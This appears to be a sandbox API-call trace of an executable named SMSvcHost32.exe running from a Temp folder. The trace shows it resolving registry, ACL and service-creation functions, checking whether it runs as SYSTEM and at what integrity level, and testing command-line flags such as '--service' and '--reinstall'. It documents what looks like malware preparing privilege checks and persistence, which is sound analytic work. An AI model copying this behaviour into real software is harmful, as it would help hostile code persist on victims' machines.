	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="AdjustTokenPrivileges") returned 0x74ac0980
	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExW") returned 0x74abf330
	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteValueW") returned 0x74ac0fb0
	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExW") returned 0x74abf350
	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeAcl") returned 0x74abfa80
	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeSecurityDescriptor") returned 0x74abfc00
	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="AddAce") returned 0x74ac1ee0
	[0087.911] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExW") returned 0x74abf7f0
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetKeySecurity") returned 0x74ad7830
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExW") returned 0x74abfa20
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAce") returned 0x74ac2550
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAclInformation") returned 0x74ac2570
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="RegGetKeySecurity") returned 0x74ac4190
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSecurityDescriptorDacl") returned 0x74abfc50
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74abf830
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExA") returned 0x74abf790
	[0087.912] GetProcAddress (hModule=0x74aa0000, lpProcName="CheckTokenMembership") returned 0x74abfb50
	[0087.913] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateWellKnownSid") returned 0x74ac0af0
	[0087.913] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthority") returned 0x74ac0ab0
	[0087.913] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthorityCount") returned 0x74ac0eb0
	[0087.913] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExA") returned 0x74abf500
	[0087.913] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x74ac3ba0
	[0087.913] GetProcAddress (hModule=0x74aa0000, lpProcName="SetEntriesInAclW") returned 0x74ac2bf0
	[0087.913] GetProcAddress (hModule=0x74aa0000, lpProcName="SetFileSecurityW") returned 0x74ac41d0
	[0087.913] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyW") returned 0x74abfaa0
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameW") returned 0x74ac1030
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceW") returned 0x74ac4210
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenSCManagerW") returned 0x74ac0ed0
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="CloseServiceHandle") returned 0x74ac0960
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateServiceW") returned 0x74ad65d0
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="SetServiceStatus") returned 0x74ac0fd0
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x74ac12f0
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceCtrlDispatcherW") returned 0x74ac12b0
	[0087.914] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyA") returned 0x74ac2500
	[0087.915] GetProcAddress (hModule=0x74aa0000, lpProcName="GetTokenInformation") returned 0x74abf370
	[0087.915] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.915] GetModuleHandleA (lpModuleName="Secur32.dll") returned 0x0
	[0087.915] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x6ff60000
	[0087.921] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.921] GetProcAddress (hModule=0x6ff60000, lpProcName="GetUserNameExW") returned 0x7469c5f0
	[0087.921] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.921] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x75120000
	[0087.921] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.921] GetProcAddress (hModule=0x75120000, lpProcName="ShellExecuteExW") returned 0x752be690
	[0087.921] GetProcAddress (hModule=0x75120000, lpProcName=0x2a8) returned 0x753cdb90
	[0087.921] GetProcAddress (hModule=0x75120000, lpProcName="SHChangeNotify") returned 0x7527cd10
	[0087.921] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.922] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x771d0000
	[0087.922] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x4, lpflOldProtect=0x19fedc | out: lpflOldProtect=0x19fedc*=0x2) returned 1
	[0087.922] GetProcAddress (hModule=0x771d0000, lpProcName="CoTaskMemFree") returned 0x748d9170
	[0087.922] GetProcAddress (hModule=0x771d0000, lpProcName="CoCreateInstance") returned 0x74900060
	[0087.922] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitialize") returned 0x77201930
	[0087.922] GetProcAddress (hModule=0x771d0000, lpProcName="CoUninitialize") returned 0x748d92a0
	[0087.922] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitializeEx") returned 0x748d88d0
	[0087.922] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x2, lpflOldProtect=0x19fee4 | out: lpflOldProtect=0x19fee4*=0x4) returned 1
	[0087.922] VirtualFree (lpAddress=0x590000, dwSize=0x32e00, dwFreeType=0x4000) returned 1
	[0087.923] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0087.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x413e60, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d0
	[0087.924] CloseHandle (hObject=0x1d0) returned 1
	[0087.924] GetCurrentProcess () returned 0xffffffff
	[0087.924] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0xffffffff) 

Thread:
	id = 90
	os_tid = 0x56c


Thread:
	id = 97
	os_tid = 0x614

	[0087.943] GetModuleHandleA (lpModuleName="kernel32") returned 0x765a0000
	[0087.943] GetProcAddress (hModule=0x765a0000, lpProcName="SetErrorMode") returned 0x765b8d20
	[0087.943] SetErrorMode (uMode=0x0) returned 0x0
	[0087.943] SetErrorMode (uMode=0x2) returned 0x0
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.944] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.945] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] GetLastError () returned 0x57
	[0087.946] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75120000
	[0087.946] GetProcAddress (hModule=0x75120000, lpProcName="CommandLineToArgvW") returned 0x752cbf80
	[0087.946] GetCommandLineW () returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0087.946] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", pNumArgs=0x205fdec | out: pNumArgs=0x205fdec) returned 0x657f88*="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0087.946] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6586e8, nSize=0x104 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x34
	[0087.947] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0087.947] GetCurrentProcess () returned 0xffffffff
	[0087.947] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x205fdbc | out: TokenHandle=0x205fdbc*=0x1d0) returned 1
	[0087.947] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x205fdc8 | out: TokenInformation=0x0, ReturnLength=0x205fdc8) returned 0
	[0087.947] GetLastError () returned 0x7a
	[0087.947] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x6479e8, TokenInformationLength=0x24, ReturnLength=0x205fdc8 | out: TokenInformation=0x6479e8, ReturnLength=0x205fdc8) returned 1
	[0087.947] ConvertSidToStringSidW () returned 0x1
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] GetLastError () returned 0x0
	[0087.947] StrCmpIW (psz1="S-1-5-18", psz2="S-1-5-21-2172869166-1497266965-2109836178-1000") returned -1
	[0087.949] LocalFree (hMem=0x64bc20) returned 0x0
	[0087.949] CloseHandle (hObject=0x1d0) returned 1
	[0087.949] GetLastError () returned 0x0
	[0087.949] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpSrch="--reinstall") returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.950] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpSrch=" --service") returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.951] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpSrch="-test") returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] GetLastError () returned 0x0
	[0087.952] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpSrch=" --vwxyz") returned 0x0
	[0087.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x413a40, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d0
	[0087.953] CloseHandle (hObject=0x1d0) returned 1
	[0087.953] GetCurrentProcess () returned 0xffffffff
	[0087.953] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x205fd54 | out: TokenHandle=0x205fd54*=0x1d0) returned 1
	[0087.953] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x205fd5c | out: TokenInformation=0x0, ReturnLength=0x205fd5c) returned 0
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.953] GetLastError () returned 0x7a
	[0087.954] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x19, TokenInformation=0x64d7a8, TokenInformationLength=0x14, ReturnLength=0x205fd5c | out: TokenInformation=0x64d7a8, ReturnLength=0x205fd5c) returned 1
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetLastError () returned 0x7a
	[0087.954] GetSidSubAuthorityCount (pSid=0x64d7b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x64d7b1
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.954] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetSidSubAuthority (pSid=0x64d7b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x64d7b8
	[0087.955] CloseHandle (hObject=0x1d0) returned 1
	[0087.955] GetVersion () returned 0x23f00206
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
